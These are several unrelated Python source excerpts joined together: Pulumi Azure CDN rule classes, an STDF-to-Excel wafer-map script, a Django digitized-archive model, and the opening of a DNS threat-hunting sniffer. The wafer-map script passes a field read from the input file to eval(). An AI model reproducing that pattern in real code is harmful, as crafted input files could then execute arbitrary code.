Defines the parameters for the action.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CacheKeyQueryStringActionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleCookiesConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CookiesMatchConditionParametersArgs']):
"""
Defines the Cookies condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'Cookies'.
:param pulumi.Input['CookiesMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'Cookies')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'Cookies'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CookiesMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CookiesMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleHttpVersionConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['HttpVersionMatchConditionParametersArgs']):
"""
Defines the HttpVersion condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'HttpVersion'.
:param pulumi.Input['HttpVersionMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'HttpVersion')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'HttpVersion'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['HttpVersionMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['HttpVersionMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleIsDeviceConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['IsDeviceMatchConditionParametersArgs']):
"""
Defines the IsDevice condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'IsDevice'.
:param pulumi.Input['IsDeviceMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'IsDevice')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'IsDevice'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['IsDeviceMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['IsDeviceMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRulePostArgsConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['PostArgsMatchConditionParametersArgs']):
"""
Defines the PostArgs condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'PostArgs'.
:param pulumi.Input['PostArgsMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'PostArgs')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'PostArgs'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['PostArgsMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['PostArgsMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleQueryStringConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['QueryStringMatchConditionParametersArgs']):
"""
Defines the QueryString condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'QueryString'.
:param pulumi.Input['QueryStringMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'QueryString')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'QueryString'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['QueryStringMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['QueryStringMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleRemoteAddressConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['RemoteAddressMatchConditionParametersArgs']):
"""
Defines the RemoteAddress condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'RemoteAddress'.
:param pulumi.Input['RemoteAddressMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'RemoteAddress')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'RemoteAddress'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['RemoteAddressMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['RemoteAddressMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleRequestBodyConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['RequestBodyMatchConditionParametersArgs']):
"""
Defines the RequestBody condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'RequestBody'.
:param pulumi.Input['RequestBodyMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'RequestBody')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
| |
<filename>Mstdfxmltoxlsx2map.py
"""
The MIT License (MIT)
Copyright (c) 2020 <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of
the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Developed by <EMAIL> in 2020
"""
from openpyxl.utils import get_column_letter
from openpyxl.styles import Font, PatternFill, Side, Border
from openpyxl import Workbook
import re
import time
timerstart = time.time()
XMLfilename = input('Input the XML (converted from STDF) filename here (not zipped), e.g. file.xml: ')
frd = open(XMLfilename, mode='r', encoding='utf-8')
filename = re.search('(.*).xml', XMLfilename)
XLSXfilename = filename.group(1) + 'Map.xlsx'
for i in range(0, 50):
line = frd.readline()
if line.startswith('SDR:'):
SDRsite_cnt = re.search('SITE_CNT=(\d+)', line)
SDRsitecnt = int(SDRsite_cnt.group(1))
break
wb = Workbook()
ws1 = wb.active
ws1.title = "AllResult"
xlsxheadrow = 7
xlsxrow = 8
OneWaferdict = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
OneWaferdictFirst = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
OneWaferdictRetest = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
OneTDdict = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
Headerinxlsx = list(OneTDdict.keys())
for k in Headerinxlsx:
for j in range(0, SDRsitecnt):
OneTDdict[k].append('na')
HBRcont = { 'hbin_num':[], 'hbin_pf':[], 'hbin_nam':[] }
Firstcont = { 'hbin_qty':[], 'hbin_yield':[] }
Retestcont = { 'hbin_qty':[], 'hbin_yield':[] }
PCRcont = { 'part_cnt':0, 'rtst_cnt':0 }
PTRLoLimit = {}
PTRHiLimit = {}
MPRLoLimit = {}
MPRHiLimit = {}
PIRindex = 0
PRRindex = 0
while ( line != ''):
line = frd.readline()
if line.startswith('PIR:'):
PIRhead = re.search('HEAD_NUM=(\d+)', line)
OneTDdict['head_num'][PIRindex] = int(PIRhead.group(1))
PIRsite = re.search('SITE_NUM=(\d+)', line)
OneTDdict['site_num'][PIRindex] = int(PIRsite.group(1))
PIRindex += 1
elif line.startswith('PTR:'):
PTRresult = re.search('RESULT=(.*) TEST_TXT', line)
PTRrslt = float( PTRresult.group(1) )
PIRcount = PIRindex
PTRtest_num = re.search('TEST_NUM=(\d+)', line)
testnumkey = 'test_num '+ PTRtest_num.group(1)
if (testnumkey in OneTDdict) == False:
OneTDdict[testnumkey] = []
for j in range(0, SDRsitecnt):
OneTDdict[testnumkey].append('na')
###
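        # Per the STDF V4 spec (as assumed by this script): OPT_FLAG bit 4
        # marks LO_LIMIT as invalid and bit 6 means the test has no low limit;
        # bits 5 and 7 are the corresponding flags for HI_LIMIT. A limit is
        # only recorded below when both of its bits are clear.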
PTRopt_flag = re.search('OPT_FLAG=(\d+)', line)
if PTRopt_flag:
PTRoptflag = int( PTRopt_flag.group(1) )
if (testnumkey in PTRLoLimit) == False:
PTRLoLimit[testnumkey] = 'na'
if (((PTRoptflag >> 4) & 0x1) == 0) and (((PTRoptflag >> 6) & 0x1) == 0):
PTRlo_limit = re.search('LO_LIMIT=(.*) HI_LIMIT', line)
PTRLoLimit[testnumkey] = float( PTRlo_limit.group(1) )
if (testnumkey in PTRHiLimit) == False:
PTRHiLimit[testnumkey] = 'na'
if (((PTRoptflag >> 5) & 0x1) == 0) and (((PTRoptflag >> 7) & 0x1) == 0):
PTRhi_limit = re.search('HI_LIMIT=(.*) UNITS', line)
PTRHiLimit[testnumkey] = float( PTRhi_limit.group(1) )
###
PTRhead = re.search('HEAD_NUM=(\d+)', line)
PTRsite = re.search('SITE_NUM=(\d+)', line)
PTRtestflg = re.search('TEST_FLG=(\d+)', line)
for j in range(0, PIRcount):
if (int(PTRhead.group(1)) == OneTDdict['head_num'][j]) and (int(PTRsite.group(1)) == OneTDdict['site_num'][j]):
if int(PTRtestflg.group(1)) == 0 :
OneTDdict[testnumkey][j] = PTRrslt
elif line.startswith('MPR:'):
MPRrslt_cnt = re.search('RSLT_CNT=(\d+)', line)
MPRrsltcnt = int( MPRrslt_cnt.group(1) )
if MPRrsltcnt != 1:
            print('MPR RSLT_CNT is not equal to 1; this script does not support that!')
break
MPRrtn_rslt = re.search('RTN_RSLT=(.*) TEST_TXT', line)
MPRrtnrslt = eval( MPRrtn_rslt.group(1) )
PIRcount = PIRindex
MPRtest_num = re.search('TEST_NUM=(\d+)', line)
testnumkey = 'test_num '+ MPRtest_num.group(1)
if (testnumkey in OneTDdict) == False:
OneTDdict[testnumkey] = []
for j in range(0, SDRsitecnt):
OneTDdict[testnumkey].append('na')
###
MPRopt_flag = re.search('OPT_FLAG=(\d+)', line)
if MPRopt_flag:
MPRoptflag = int( MPRopt_flag.group(1) )
if (testnumkey in MPRLoLimit) == False:
MPRLoLimit[testnumkey] = 'na'
if (((MPRoptflag >> 4) & 0x1) == 0) and (((MPRoptflag >> 6) & 0x1) == 0):
MPRlo_limit = re.search('LO_LIMIT=(.*) HI_LIMIT', line)
MPRLoLimit[testnumkey] = float( MPRlo_limit.group(1) )
if (testnumkey in MPRHiLimit) == False:
MPRHiLimit[testnumkey] = 'na'
if (((MPRoptflag >> 5) & 0x1) == 0) and (((MPRoptflag >> 7) & 0x1) == 0):
MPRhi_limit = re.search('HI_LIMIT=(.*) START_IN', line)
MPRHiLimit[testnumkey] = float( MPRhi_limit.group(1) )
###
MPRhead = re.search('HEAD_NUM=(\d+)', line)
MPRsite = re.search('SITE_NUM=(\d+)', line)
MPRtestflg = re.search('TEST_FLG=(\d+)', line)
for j in range(0, PIRcount):
if (int(MPRhead.group(1)) == OneTDdict['head_num'][j]) and (int(MPRsite.group(1)) == OneTDdict['site_num'][j]):
if int(MPRtestflg.group(1)) == 0 :
OneTDdict[testnumkey][j] = float(MPRrtnrslt[0])
elif line.startswith('PRR:'):
PIRcount = PIRindex
PRRhead = re.search('HEAD_NUM=(\d+)', line)
PRRsite = re.search('SITE_NUM=(\d+)', line)
PRRhbin = re.search('HARD_BIN=(\d+)', line)
PRRsbin = re.search('SOFT_BIN=(\d+)', line)
PRRxcrd = re.search('X_COORD=([-+]?\d+)', line)
PRRycrd = re.search('Y_COORD=([-+]?\d+)', line)
for j in range(0, PIRcount):
if (int(PRRhead.group(1)) == OneTDdict['head_num'][j]) and (int(PRRsite.group(1)) == OneTDdict['site_num'][j]):
OneTDdict['hard_bin'][j] = int(PRRhbin.group(1))
OneTDdict['soft_bin'][j] = int(PRRsbin.group(1))
OneTDdict['x_coord'][j] = int(PRRxcrd.group(1))
OneTDdict['y_coord'][j] = int(PRRycrd.group(1))
PRRindex += 1
OneWaferdict['head_num'].append( int(PRRhead.group(1)) )
OneWaferdict['site_num'].append( int(PRRsite.group(1)) )
OneWaferdict['hard_bin'].append( int(PRRhbin.group(1)) )
OneWaferdict['soft_bin'].append( int(PRRsbin.group(1)) )
OneWaferdict['x_coord'].append( int(PRRxcrd.group(1)) )
OneWaferdict['y_coord'].append( int(PRRycrd.group(1)) )
if PIRcount == PRRindex:
OneTDheader = list(OneTDdict.keys())
if len(Headerinxlsx) < len(OneTDheader):
Headerinxlsx = OneTDheader
ws1.cell( row=1, column=1, value='Hi_Limit' ) ###
ws1.cell( row=2, column=1, value='Lo_Limit' ) ###
for y in range(0, len(OneTDheader)):
ws1.cell( row=xlsxheadrow, column=(y+1), value=OneTDheader[y] )
if OneTDheader[y] in PTRHiLimit:
ws1.cell( row=1, column=(y+1), value=PTRHiLimit[OneTDheader[y]] )
if OneTDheader[y] in PTRLoLimit:
ws1.cell( row=2, column=(y+1), value=PTRLoLimit[OneTDheader[y]] )
if OneTDheader[y] in MPRHiLimit:
ws1.cell( row=1, column=(y+1), value=MPRHiLimit[OneTDheader[y]] )
if OneTDheader[y] in MPRLoLimit:
ws1.cell( row=2, column=(y+1), value=MPRLoLimit[OneTDheader[y]] )
for y in range(0, len(OneTDheader)):
keyname = OneTDheader[y]
for x in range(0, PIRcount):
ws1.cell( row=(xlsxrow+x), column=(y+1), value=OneTDdict[keyname][x] )
xlsxrow = xlsxrow + PIRcount
for k in OneTDdict.keys():
for j in range(0, SDRsitecnt):
OneTDdict[k][j] = 'na'
PIRindex = 0
PRRindex = 0
###
###
if line.startswith('HBR:'):
HBRhead = re.search('HEAD_NUM=(\d+)', line)
if int(HBRhead.group(1)) == 255:
HBRhbin_num = re.search('HBIN_NUM=(\d+)', line)
HBRcont['hbin_num'].append( int(HBRhbin_num.group(1)) )
HBRhbin_pf = re.search('HBIN_PF=([PF]+)', line)
HBRcont['hbin_pf'].append( HBRhbin_pf.group(1) )
HBRhbin_nam = re.search('HBIN_NAM=(.*)', line)
if HBRhbin_nam:
HBRcont['hbin_nam'].append( HBRhbin_nam.group(1) )
else:
HBRcont['hbin_nam'].append('na')
###
###
if line.startswith('PCR:'):
PCRhead = re.search('HEAD_NUM=(\d+)', line)
if int(PCRhead.group(1)) == 255:
PCRpart_cnt = re.search('PART_CNT=(\d+)', line)
PCRcont['part_cnt'] = int(PCRpart_cnt.group(1))
PCRrtst_cnt = re.search('RTST_CNT=(\d+)', line)
PCRcont['rtst_cnt'] = int(PCRrtst_cnt.group(1))
###
###
print('PCR: HEAD_NUM=255', PCRcont)
print('HBR: HEAD_NUM=255', HBRcont)
print('OneWaferdict length', len(OneWaferdict['site_num']) )
print('OneWaferdict Xmax', max(OneWaferdict['x_coord']) , 'Xmin', min(OneWaferdict['x_coord']) )
print('OneWaferdict Ymax', max(OneWaferdict['y_coord']) , 'Ymin', min(OneWaferdict['y_coord']) )
OneWaferXmax = max(OneWaferdict['x_coord'])
OneWaferXmin = min(OneWaferdict['x_coord'])
OneWaferYmax = max(OneWaferdict['y_coord'])
OneWaferYmin = min(OneWaferdict['y_coord'])
###
Hbincolor = []
for k in range(0, 40, 1):
Hbincolor.append('na')
Hbincolor[0] = '00FFFFFF'
Hbincolor[1] = '0000FF00'
Hbincolor[2] = '0099CC00'
Hbincolor[3] = '00008000'
Hbincolor[4] = '00003300'
Hbincolor[6] = '00FF00FF'
Hbincolor[7] = '0000FFFF'
Hbincolor[10] = '000000FF'
Hbincolor[11] = '00FF0000'
Hbincolor[12] = '00FFFF00'
Hbincolor[13] = '00000080'
Hbincolor[15] = '00800000'
Hbincolor[17] = '00808000'
Hbincolor[18] = '00800080'
Hbincolor[19] = '00008080'
Hbincolor[20] = '009999FF'
Hbincolor[22] = '00993366'
Hbincolor[23] = '00FFFFCC'
Hbincolor[24] = '00CCFFFF'
Hbincolor[25] = '00660066'
Hbincolor[26] = '00FF8080'
Hbincolor[27] = '00C0C0C0'
Hbincolor[28] = '00808080'
Hbincolor[29] = '000066CC'
Hbincolor[30] = '00CCCCFF'
Hbincolor[31] = '00FFFF99'
Hbincolor[34] = '0099CCFF'
###
# only consider one head (HEAD_NUM=1) from STDF
MapPosX = 'L' # can be toward 'R' (right) or 'L' (left)
MapPosY = 'D' # can be toward 'U' (up) or 'D' (down)
colstart = 3
rowstart = 3
sd = Side(style='medium', color="000000")
blackbd= Border(left=sd, top=sd, right=sd, bottom=sd)
ws2 = wb.create_sheet(title="FirstscreenedMap")
if PCRcont['rtst_cnt'] > 0:
ws3 = wb.create_sheet(title="RetestedMap")
retest_count = 0
if MapPosX == 'L':
Xgapvalue = OneWaferXmax + colstart
colindex = colstart
for i in range(OneWaferXmax, (OneWaferXmin-1), -1):
ws2.column_dimensions[get_column_letter(colindex)].width = 5.0
ws2.cell( row=1, column=colindex, value=i ).border = blackbd
if PCRcont['rtst_cnt'] > 0:
ws3.column_dimensions[get_column_letter(colindex)].width = 5.0
ws3.cell( row=1, column=colindex, value=i ).border = blackbd
colindex += 1
if MapPosX == 'R':
Xgapvalue = OneWaferXmin - colstart # to be checked
colindex = colstart
for i in range(OneWaferXmin, (OneWaferXmax+1), 1):
ws2.column_dimensions[get_column_letter(colindex)].width = 5.0
ws2.cell( row=1, column=colindex, value=i ).border = blackbd
colindex += 1
if MapPosY == 'D':
Ygapvalue = OneWaferYmin - rowstart
rowindex = rowstart
for i in range(OneWaferYmin, (OneWaferYmax+1), 1):
ws2.column_dimensions['A'].width = 5.0
ws2.cell( row=rowindex, column=1, value=i ).border = blackbd
if PCRcont['rtst_cnt'] > 0:
ws3.column_dimensions['A'].width = 5.0
ws3.cell( row=rowindex, column=1, value=i ).border = blackbd
rowindex += 1
if MapPosY == 'U':
Ygapvalue = OneWaferYmax + rowstart # to be checked
rowindex = | |
or full; defaults to full
item_type = models.CharField(
max_length=1,
choices=ITEMTYPE_CHOICES,
default=FULL,
help_text="Portion of the work that is included; used to determine icon for public display.",
)
#: book or journal title for excerpt or article
book_journal = models.TextField(
"Book/Journal title",
help_text="title of the book or journal that includes this content (excerpt/article only)",
blank=True,
)
pages_orig = models.CharField(
"Page range (original)",
max_length=255,
help_text="Page range in the original work (for display and citation).",
blank=True,
)
pages_digital = models.CharField(
"Page range (digital edition)",
max_length=255,
help_text="Sequence of pages in the digital edition. "
+ "Use full digits for start and end separated by a dash (##-##); "
+ "for multiple sequences, separate ranges by a comma (##-##, ##-##). "
+ "NOTE: removing page range may have unexpected results.",
blank=True,
validators=[validate_page_range],
)
class Meta:
ordering = ("sort_title",)
# require unique combination of source id + page range,
# since we need to allow multiple excerpts from the same source
constraints = [
models.UniqueConstraint(
fields=["source_id", "pages_digital"], name="unique_sourceid_pagerange"
)
]
def get_absolute_url(self):
"""
Return object's url for
:class:`ppa.archive.views.DigitizedWorkDetailView`
"""
url_opts = {"source_id": self.source_id}
# start page must be specified if set but must not be included if empty
if self.pages_digital:
url_opts["start_page"] = self.first_page()
return reverse("archive:detail", kwargs=url_opts)
def __str__(self):
"""Default string display. Uses :attr:`source_id` and :attr:`pages_digital` if any"""
if self.pages_digital:
return "%s (%s)" % (self.source_id, self.pages_digital)
return self.source_id
def clean_fields(self, exclude=None):
if not exclude or "pages_digital" not in exclude:
# normalize whitespace in pages digital field before applying regex validation
self.pages_digital = " ".join(self.pages_digital.strip().split())
super().clean_fields(exclude=exclude)
@property
def is_suppressed(self):
"""Item has been suppressed (based on :attr:`status`)."""
return self.status == self.SUPPRESSED
def display_title(self):
"""admin display title to allow displaying title but sorting on sort_title"""
return self.title
display_title.short_description = "title"
display_title.admin_order_field = "sort_title"
def is_public(self):
"""admin display field indicating if record is public or suppressed"""
return self.status == self.PUBLIC
is_public.short_description = "Public"
is_public.boolean = True
is_public.admin_order_field = "status"
    #: regular expression for cleaning preliminary text from publisher names
printed_by_re = (
r"^(Printed)?( and )?(Pub(.|lished|lisht)?)?( and sold)? (by|for|at)( the)? ?"
)
# Printed by/for (the); Printed and sold by; Printed and published by;
# Pub./Published/Publisht at/by/for the
pubyear_re = re.compile(r"(?P<year>\d{4})")
@property
def has_fulltext(self):
"""Checks if an item has full text (currently only items from
HathiTrust or Gale)."""
return self.source in [self.HATHI, self.GALE]
@cached_property
def hathi(self):
""":class:`ppa.archive.hathi.HathiObject` for HathiTrust records,
for working with data in HathiTrust pairtree data structure."""
if self.source == self.HATHI:
return HathiObject(self.source_id)
return None
def save(self, *args, **kwargs):
# if status has changed so that object is now suppressed,
# do some cleanup
if self.has_changed("status") and self.status == self.SUPPRESSED:
# remove indexed page content from Solr
self.solr.update.delete_by_query('source_id:"%s"' % self.source_id)
# if this is a HathiTrust item, remove pairtree data
if self.source == DigitizedWork.HATHI:
self.hathi.delete_pairtree_data()
# Solr identifier is based on combination of source id and first page;
# if either changes, remove the old record from Solr before saving
# with the new identifier
if self.has_changed("source_id") or self.has_changed("pages_digital"):
# store the updated values
new_source_id = self.source_id
new_pages_digital = self.pages_digital
# temporarily revert to previous value to remove from index
self.source_id = self.initial_value("source_id")
self.pages_digital = self.initial_value("pages_digital")
self.remove_from_index()
# restore new values
self.source_id = new_source_id
self.pages_digital = new_pages_digital
if self.has_changed("pages_digital"):
# if there is a page range set now, update page count and index
if self.pages_digital:
# recalculate page total based on current range
self.page_count = self.count_pages()
# update index to remove all pages that are no longer in range
self.solr.update.delete_by_query(
'source_id:"%s" AND item_type:page NOT order:(%s)'
% (self.source_id, " OR ".join(str(p) for p in self.page_span))
)
# any page range change requires reindexing (potentially slow)
logger.debug("Reindexing pages for %s after change to page range", self)
self.index_items(Page.page_index_data(self))
# NOTE: removing a page range may not work as expected
# (does not recalculate page count; cannot recalculate for Gale items)
super().save(*args, **kwargs)
def clean(self):
"""Add custom validation to trigger a save error in the admin
if someone tries to unsuppress a record that has been suppressed
(not yet supported)."""
if self.has_changed("status") and self.status != self.SUPPRESSED:
raise ValidationError("Unsuppressing records not yet supported.")
# should not be editable in admin, but add a validation check
# just in case
if self.has_changed("source_id") and self.source == self.HATHI:
raise ValidationError(
"Changing source ID for HathiTrust records is not supported"
)
def compare_protected_fields(self, db_obj):
"""Compare protected fields in a
:class:`ppa.archive.models.DigitizedWork` instance and return those
that are changed.
:param object db_obj: Database instance of a
:class:`~ppa.archive.models.DigitizedWork`.
"""
changed_fields = []
# if a field has changed, append to changed fields
for field in ProtectedWorkFieldFlags.all_flags:
# field is in format of ProtectedWorkFieldFlags.title
field_name = str(field)
# if obj has a different value for a protected field
# than its db counterpart
if getattr(self, field_name) != getattr(db_obj, field_name):
# append as a now protected field
changed_fields.append(field_name)
return changed_fields
def populate_fields(self, field_data):
"""Conditionally update fields as protected by flags using Hathi
bibdata information.
:param dict field_data: A dictionary of fields updated from a
:class:`ppa.archive.hathi.HathiBibliographicRecord` instance.
"""
protected_fields = [str(field) for field in self.protected_fields]
for field, value in field_data.items():
if field not in protected_fields:
setattr(self, field, value)
def metadata_from_marc(self, marc_record, populate=True):
"""Get metadata from MARC record and return a dictionary
of the data. When populate is True, calls `populate_fields`
to set values."""
# create dictionary to store bibliographic information
field_data = {}
# set title and subtitle from marc if possible
# - clean title: strip trailing space & slash and initial bracket
field_data["title"] = marc_record["245"]["a"].rstrip(" /").lstrip("[")
# according to PUL CAMS,
# 245 subfield contains the subtitle *if* the preceding field
# ends with a colon. (Otherwise could be a parallel title,
# e.g. title in another language).
# HOWEVER: metadata from Hathi doesn't seem to follow this
# pattern (possibly due to records being older?)
# subfields is a list of code, value, code, value
# iterate in paired steps of two starting with first and second
# for code, value in zip(marc_record['245'].subfields[0::2],
# marc_record['245'].subfields[1::2]):
# if code == 'b':
# break
# preceding_character = value[-1:]
# if preceding_character == ':':
# self.subtitle = marc_record['245']['b'] or ''
# NOTE: skipping preceding character check for now
field_data["subtitle"] = marc_record["245"]["b"] or ""
# strip trailing space & slash from subtitle
field_data["subtitle"] = field_data["subtitle"].rstrip(" /")
# indicator 2 provides the number of characters to be
# skipped when sorting (could be 0)
try:
non_sort = int(marc_record["245"].indicators[1])
except ValueError:
# at least one record has a space here instead of a number
# probably a data error, but handle it
# - assuming no non-sort characters
non_sort = 0
# strip whitespace, since a small number of records have a
# nonsort value that doesn't include a space after a
# definite article.
# Also strip punctuation, since MARC only includes it in
# non-sort count when there is a definite article.
field_data["sort_title"] = marc_record.title()[non_sort:].strip(' "[')
field_data["author"] = marc_record.author() or ""
# remove a note present on some records and strip whitespace
field_data["author"] = (
field_data["author"].replace("[from old catalog]", "").strip()
)
# removing trailing period, except when it is part of an
# initial or known abbreviation (i.e, Esq.)
# Look for single initial, but support initials with no spaces
if field_data["author"].endswith(".") and not re.search(
r"( ([A-Z]\.)*[A-Z]| Esq)\.$", field_data["author"]
):
field_data["author"] = field_data["author"].rstrip(".")
# field 260 includes publication information
if "260" in marc_record:
# strip trailing punctuation from publisher and pub place
# subfield $a is place of publication
field_data["pub_place"] = marc_record["260"]["a"] or ""
field_data["pub_place"] = field_data["pub_place"].rstrip(";:,")
# if place is marked as unknown ("sine loco"), leave empty
if field_data["pub_place"].lower() == "[s.l.]":
field_data["pub_place"] = ""
# subfield $b is name of publisher
field_data["publisher"] = marc_record["260"]["b"] or ""
field_data["publisher"] = field_data["publisher"].rstrip(";:,")
# if publisher is marked as unknown ("sine nomine"), leave empty
if field_data["publisher"].lower() == "[s.n.]":
field_data["publisher"] = ""
# remove printed by statement before publisher name
field_data["publisher"] = re.sub(
self.printed_by_re, "", field_data["publisher"], flags=re.IGNORECASE
)
# Gale/ECCO dates may | |
#!/usr/bin/env python3
""" greylost - DNS threat hunting. """
import os
import sys
import json
import copy
import argparse
import signal
import pickle
import atexit
import syslog
import statistics
from base64 import b64encode
from time import sleep, time
from datetime import datetime
import dnslib
from dmfrbloom.timefilter import TimeFilter
from pysniffer import Sniffer
from record_types import DNS_RECORD_TYPES
class RollingLog():
def __init__(self, size):
self.size = size
self.log = [None for _ in range(size)]
def add(self, data):
self.log += [data]
if len(self.log) > self.size:
self.log = self.log[-1 * self.size:]
def clear(self):
self.log = []
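# Hedged usage sketch of RollingLog: a fixed-size window of the most recent
# samples (unfilled slots start out as None).
#
#   window = RollingLog(3)
#   for sample in (1, 2, 3, 4):
#       window.add(sample)
#   window.log  # -> [2, 3, 4]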
def error_fatal(msg, exit_value=os.EX_USAGE):
""" error_fatal() - Log an error and exit.
Args:
msg (str) - Error message.
exit_value - Value to pass to exit()
Returns:
Nothing.
"""
error(msg)
exit(exit_value)
def error(msg):
""" error() - Log an error.
Args:
msg (str) - Error message.
Returns:
Nothing.
"""
if not Settings.get("daemonize"):
print("[-] %s" % msg, file=sys.stderr)
syslog.syslog(msg)
def log(msg):
""" log() - Log a message.
Args:
msg (str) - Message.
Returns:
Nothing
"""
if not Settings.get("daemonize"):
print("[+] %s" % msg)
syslog.syslog(msg)
def parse_dns_response(response_list):
""" parse_dns_response() - Parses DNS responses.
Args:
response_list (list) - Response list
Returns:
List of responses sorted by "rdata" key.
"""
response_sorted_list = []
for response in response_list:
# <EDNS Option: Code=4 Data='0006629ac1efefda609ac1efefda'>
if isinstance(response.rdata, dnslib.EDNSOption):
rdata = {"code": response.rdata.code, "data": response.rdata.data}
